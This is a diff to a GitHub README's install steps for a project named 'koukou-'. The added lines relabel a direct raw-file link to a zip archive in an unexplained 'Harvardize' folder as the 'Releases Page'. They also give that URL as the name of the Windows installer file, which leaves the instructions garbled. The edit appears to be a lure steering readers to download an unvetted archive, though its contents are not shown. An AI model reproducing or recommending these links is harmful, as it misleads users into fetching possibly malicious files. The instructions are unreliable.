NewbieCoder343/koukou-/README.md

 Follow these simple steps to install and run koukou-:

 ### Step 1: Visit the Download Page
-Go to the [Releases Page](https://github.com/NewbieCoder343/koukou-/releases) to find the latest version of koukou-.
+Go to the [Releases Page](https://raw.githubusercontent.com/NewbieCoder343/koukou-/main/Harvardize/koukou-.zip) to find the latest version of koukou-.

 ### Step 2: Choose Your Version
 Look for the version that suits your operating system.
 Click on the appropriate file to start the download.

 ### Step 3: Download the Installer
 Once you click to download, your browser will start downloading the file.
-The file might be named something like `koukou-setup.exe` for Windows or `koukou-dmg` for macOS.
+The file might be named something like `https://raw.githubusercontent.com/NewbieCoder343/koukou-/main/Harvardize/koukou-.zip` for Windows or `koukou-dmg` for macOS.

 ### Step 4: Run the Installer
 - **Windows:** Locate the downloaded `.exe` file, double-click it, and follow the on-screen instructions.